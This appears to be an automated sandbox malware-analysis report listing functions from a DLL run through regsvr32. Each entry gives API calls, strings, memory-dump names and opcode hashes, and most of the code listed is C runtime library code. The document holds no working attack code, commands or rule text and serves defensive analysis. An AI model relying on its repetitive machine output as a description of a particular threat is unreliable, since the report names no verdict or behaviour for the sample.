                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: String$free$ByteCharMultiWidemalloc$ErrorLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1837315383-0
                                                                                                                                                                                    • Opcode ID: 6917fdf182d5b5fd0a04eb41c67e8726f2b310508b24c84522f096db86da0c52
                                                                                                                                                                                    • Instruction ID: 4555ab3b21f964263abb145912eb1c6a711f3d76f4fbb3c5d35fac8a60dab22e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6917fdf182d5b5fd0a04eb41c67e8726f2b310508b24c84522f096db86da0c52
                                                                                                                                                                                    • Instruction Fuzzy Hash: FBF1B0322016888AEBA3CFA5E4403D977A1F74CBD8F548615FA5A57BD8DF38CB498700
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180025A20 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 137fileCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,?,?,?,0000000180025C7C,?,?,?,?,0000000180026EC0,?,?,00000000,0000000180026F9F), ref: 0000000180025AE3
                                                                                                                                                                                    • GetStdHandle.KERNEL32(?,?,?,?,?,0000000180025C7C,?,?,?,?,0000000180026EC0,?,?,00000000,0000000180026F9F), ref: 0000000180025BEF
                                                                                                                                                                                    • WriteFile.KERNEL32 ref: 0000000180025C29
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$HandleModuleNameWrite
                                                                                                                                                                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                                                                    • API String ID: 3784150691-4022980321
                                                                                                                                                                                    • Opcode ID: b7a8336b30065f91ebc68788751ab8086c469dce652af40d21ec98890bdf84ea
                                                                                                                                                                                    • Instruction ID: 189fb5fc7490ce2dedd55bf98863a97403b275aac69a11a23712efd9edb32541
                                                                                                                                                                                    • Opcode Fuzzy Hash: b7a8336b30065f91ebc68788751ab8086c469dce652af40d21ec98890bdf84ea
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2351B135310A4D41FBA7DB61A5967EA63A1B79C3C9F54C626BD4D82AD6CF38C30D8304
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018001FBE0 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3778485334-0
                                                                                                                                                                                    • Opcode ID: 307277e150c71395a93ec0ec22d9674afc578be8ac3d6484db32eb2b7410aef2
                                                                                                                                                                                    • Instruction ID: 19097dad74a2df2204279609a7770a89be51937cb1f9c1e1ba4407c5f60df317
                                                                                                                                                                                    • Opcode Fuzzy Hash: 307277e150c71395a93ec0ec22d9674afc578be8ac3d6484db32eb2b7410aef2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9031E635209F4889E7929B54F8903DA73A4F78C7D8F928016EA8D47766DF7CC688C744
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180027728 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 171COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _errno$DecodePointer_getptd
                                                                                                                                                                                    • String ID: -$e+000$gfff
                                                                                                                                                                                    • API String ID: 2834218312-2620144452
                                                                                                                                                                                    • Opcode ID: 1de7ff44d5da7dde37e46bbbeebf952b0c26d497c816eca47abb37014660e93e
                                                                                                                                                                                    • Instruction ID: b5e464094c3208e05ea1b6fb26992f589a00952629b93686945b935a1d87cebe
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1de7ff44d5da7dde37e46bbbeebf952b0c26d497c816eca47abb37014660e93e
                                                                                                                                                                                    • Instruction Fuzzy Hash: E66103367147C88AE7A78B2594417CE7B92F389BD8F18D215EA5C47B86CF39C658C700
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180029270 Relevance: 10.6, APIs: 7, Instructions: 138COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _errno$ByteCharErrorLastMultiWide
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3895584640-0
                                                                                                                                                                                    • Opcode ID: 8c05147ebc9be867ce35319bbce1104c6b25b1477bc4ad30c9b94d65abf1cd43
                                                                                                                                                                                    • Instruction ID: 2e07fc1dcd4186e5053969f21a42df234c676ec04967014daaced9b4438d3042
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c05147ebc9be867ce35319bbce1104c6b25b1477bc4ad30c9b94d65abf1cd43
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0351A4326066888AF7F39FA5E0407EEB790B38D7D0F68C115F69947AC5CE78CA498701
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018000EDF0 Relevance: 10.6, APIs: 7, Instructions: 120windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2853195852-0
                                                                                                                                                                                    • Opcode ID: 521fb216197092060e1255597202c9f501887027c04918bf3cf28e2e6dae3f12
                                                                                                                                                                                    • Instruction ID: d5919084e813515b551a04d63d74427c2aa65c25303876256ebad84584e92488
                                                                                                                                                                                    • Opcode Fuzzy Hash: 521fb216197092060e1255597202c9f501887027c04918bf3cf28e2e6dae3f12
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1541C432604ACC82FBE6DB26D8497EA73A1BB8DBC4F15D424FE0553695DF38CA498700
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018000A74C Relevance: 9.1, APIs: 6, Instructions: 62windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MetricsPaintSystem$BeginClientDrawIconIconicMessageRectSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1182735605-0
                                                                                                                                                                                    • Opcode ID: 81ef6b8dc79c311c082dd4e339fa402c74f1a77fd9d6046b71fbb5e8db54486b
                                                                                                                                                                                    • Instruction ID: 6396cba0f8348ba34940b31b6af6ad7d381c212d192f7aa7d10b446046caa961
                                                                                                                                                                                    • Opcode Fuzzy Hash: 81ef6b8dc79c311c082dd4e339fa402c74f1a77fd9d6046b71fbb5e8db54486b
                                                                                                                                                                                    • Instruction Fuzzy Hash: A0218C32218A4986E7A1DB35E45879F73A0F78DBC5F458121FE8E83758CF38D60A8B40
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180021708 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1269745586-0
                                                                                                                                                                                    • Opcode ID: 70a2fb072c00225d7c7db3b490eb8d81a4e437aaaaaac7ab38b40a578da3d227
                                                                                                                                                                                    • Instruction ID: 1f55c2fed6c493ffe08d6dcfede292f75507489463a8ed8e9b7efe49f0a70e35
                                                                                                                                                                                    • Opcode Fuzzy Hash: 70a2fb072c00225d7c7db3b490eb8d81a4e437aaaaaac7ab38b40a578da3d227
                                                                                                                                                                                    • Instruction Fuzzy Hash: 13314B32608B8986EBA69B50F4403DBB3A4F79C785F508115EB8D43A59EF78C249CB00
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180027A8C Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 298COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _errno$DecodePointer_getptd
                                                                                                                                                                                    • String ID: 0$gfffffff
                                                                                                                                                                                    • API String ID: 2834218312-1804767287
                                                                                                                                                                                    • Opcode ID: 2c843449f7fe5b2b76c0d1ed4805592bd3691fbc217902258971889c748f19a7
                                                                                                                                                                                    • Instruction ID: af199aae6fed13a2dfd45317e9722b6eead39349b74fb061a12141e4f58284e9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c843449f7fe5b2b76c0d1ed4805592bd3691fbc217902258971889c748f19a7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 66B112727053CC86EBA38B2991453AE7BA6E7597D0F14C222EB5D077D6DA39CA58C300
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018002596C Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1445889803-0
                                                                                                                                                                                    • Opcode ID: 385050f3830c1cb97e8d02a5e3b130e169b692a8a37a80970b22e0d2a3b16dab
                                                                                                                                                                                    • Instruction ID: 6386498a51f40f0853ba66a5cc7a15e2bf05392e2eb4221cc56a784e8394d85a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 385050f3830c1cb97e8d02a5e3b130e169b692a8a37a80970b22e0d2a3b16dab
                                                                                                                                                                                    • Instruction Fuzzy Hash: 88015B35225A0886E7828F21E8903D66360F74DBD1F46A620FE9E477A4CF3CCA988704
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018000F00C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,00080000,000000018000FC14), ref: 000000018000F02E
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,?,?,?,?,?,00080000,000000018000FC14), ref: 000000018000F041
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,00080000,000000018000FC14), ref: 000000018000F05F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                    • String ID: InitCommonControls
                                                                                                                                                                                    • API String ID: 310444273-2489084829
                                                                                                                                                                                    • Opcode ID: 96f75e27b71ea35d2758aa8c486ac1b3d36d4cb0ab958ba436b58c8f76f8dbf1
                                                                                                                                                                                    • Instruction ID: f5d447bc5e0debc5eba7e3968f8a3cf0b775a4baacca98cb39112e7da828dd06
                                                                                                                                                                                    • Opcode Fuzzy Hash: 96f75e27b71ea35d2758aa8c486ac1b3d36d4cb0ab958ba436b58c8f76f8dbf1
                                                                                                                                                                                    • Instruction Fuzzy Hash: D701E832201F8985DF96CF25E49039973A1E75CF88F198125DA4C47764DF74C9A9C340
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018000F988 Relevance: 6.0, APIs: 4, Instructions: 49keyboardwindowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: State$LongMessageSendWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1063413437-0
                                                                                                                                                                                    • Opcode ID: 3378326a2bd31b4697c2027b64095a4f4620bfc6a4c5c14b04252cc7c112c546
                                                                                                                                                                                    • Instruction ID: 9c3a15c8796f1cd257bf9a6991dfaf30841fb567fe232aecd4f01f7e86110207
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3378326a2bd31b4697c2027b64095a4f4620bfc6a4c5c14b04252cc7c112c546
                                                                                                                                                                                    • Instruction Fuzzy Hash: D811CC3430054C82FBF697D6F4153EA2391A74DBC0F49D431FA8A03F85CD24C699A311
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180001034 Relevance: 4.5, APIs: 3, Instructions: 43COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Resource$LoadLockSizeof
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2853612939-0
                                                                                                                                                                                    • Opcode ID: 0643980941f78038ba91f0768f0f340d23a4776233c180e94be5b7ff5dcac873
                                                                                                                                                                                    • Instruction ID: 2f9347a30e5f3aff6e4aec704e026809220156a99409e98979fea9db47e80d42
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0643980941f78038ba91f0768f0f340d23a4776233c180e94be5b7ff5dcac873
                                                                                                                                                                                    • Instruction Fuzzy Hash: 65019E32711B95C9EF928B21A4013EA72A0AB5CFD6F08C121FA9A07784DE7CC9898700
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018000C030 Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: c999c8c1b9d59f4276a9e938d18ca5b7a82132423f0c6caada9f7e5b982e25e4
                                                                                                                                                                                    • Instruction ID: 0103cda5c49e3e6c242f9b0397a4010d769cf60c525843e814d7ec2032ac56e5
                                                                                                                                                                                    • Opcode Fuzzy Hash: c999c8c1b9d59f4276a9e938d18ca5b7a82132423f0c6caada9f7e5b982e25e4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7401123171464CC5F7D6DB26EA407FA73A1AB8CBC1F54C020B95A866A5DE68C74DC702
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00000001800260BC Relevance: 4.5, APIs: 3, Instructions: 35COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RtlCaptureContext.KERNEL32 ref: 00000001800260FB
                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32 ref: 0000000180026141
                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32 ref: 000000018002614C
                                                                                                                                                                                      • Part of subcall function 0000000180025A20: GetModuleFileNameA.KERNEL32(?,?,?,?,?,0000000180025C7C,?,?,?,?,0000000180026EC0,?,?,00000000,0000000180026F9F), ref: 0000000180025AE3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
